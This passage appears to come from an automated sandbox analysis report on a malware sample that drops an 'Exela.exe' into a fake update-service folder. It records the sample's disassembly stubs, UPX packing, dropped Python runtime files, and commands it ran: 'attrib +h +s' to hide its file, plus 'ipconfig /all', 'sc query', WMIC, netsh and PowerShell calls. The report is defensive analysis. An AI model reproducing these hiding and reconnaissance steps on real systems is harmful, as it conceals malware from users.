            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: 2_2_00007FFD93BF6EAB push rsi; ret 2_2_00007FFD93BF6EAC
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: 2_2_00007FFD93BF6F9D push r10; ret 2_2_00007FFD93BF6FB0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: 2_2_00007FFD93BFA4B9 push rdx; ret 2_2_00007FFD93BFA510
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: 2_2_00007FFD93BF85B7 push r12; ret 2_2_00007FFD93BF85F3
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: 2_2_00007FFD93BF91B3 push rdi; iretd 2_2_00007FFD93BF91B5
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: 2_2_00007FFD93BF6EC6 push r10; retf 2_2_00007FFD93BF6EC9
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: 2_2_00007FFD93BF6CDC push r8; ret 2_2_00007FFD93BF6CE9
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: 2_2_00007FFD93BF856C push rbp; retf 2_2_00007FFD93BF8585
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: 2_2_00007FFD93BF6F64 push r8; ret 2_2_00007FFD93BF6F6C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: 2_2_00007FFD93BF8F63 push r12; iretd 2_2_00007FFD93BF8F7A
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: 2_2_00007FFD93BF8E76 push rbp; iretq 2_2_00007FFD93BF8E77
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: 2_2_00007FFD93BFA174 push rsp; ret 2_2_00007FFD93BFA175
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: 2_2_00007FFD93BF6E9C push rsp; iretd 2_2_00007FFD93BF6E9D
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: 2_2_00007FFD93BF9D95 push rsp; iretq 2_2_00007FFD93BF9D96
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 81_2_00007FFD33056329 push ecx; ret 81_2_00007FFD3305632C
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1

            Persistence and Installation Behavior

            barindex
            Uses attrib.exe to hide files
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe"
            Uses ipconfig to lookup or modify the Windows network settings
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /all
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI12922\_queue.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI12922\aiohttp\_http_writer.cp310-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI12922\_ssl.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI12922\libcrypto-1_1.dllJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI12922\multidict\_multidict.cp310-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI12922\python3.dllJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI12922\unicodedata.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI12922\aiohttp\_http_parser.cp310-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI12922\python310.dllJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI12922\VCRUNTIME140.dllJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI12922\libffi-7.dllJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI12922\select.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI12922\_overlapped.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI12922\_ctypes.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI12922\libssl-1_1.dllJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI12922\sqlite3.dllJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI12922\_hashlib.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI12922\_multiprocessing.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI12922\aiohttp\_websocket.cp310-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI12922\propcache\_helpers_c.cp310-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile created: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI12922\frozenlist\_frozenlist.cp310-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI12922\cryptography\hazmat\bindings\_rust.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI12922\aiohttp\_helpers.cp310-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI12922\_socket.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI12922\_cffi_backend.cp310-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI12922\_bz2.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI12922\_lzma.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI12922\_sqlite3.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI12922\yarl\_quoting_c.cp310-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI12922\_asyncio.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI12922\_decimal.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI12922\_uuid.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI12922\pyexpat.pydJump to dropped file
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query type= service state= all
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exeCode function: 0_2_00007FF7B2B65830 GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,0_2_00007FF7B2B65830
            Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\systeminfo.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
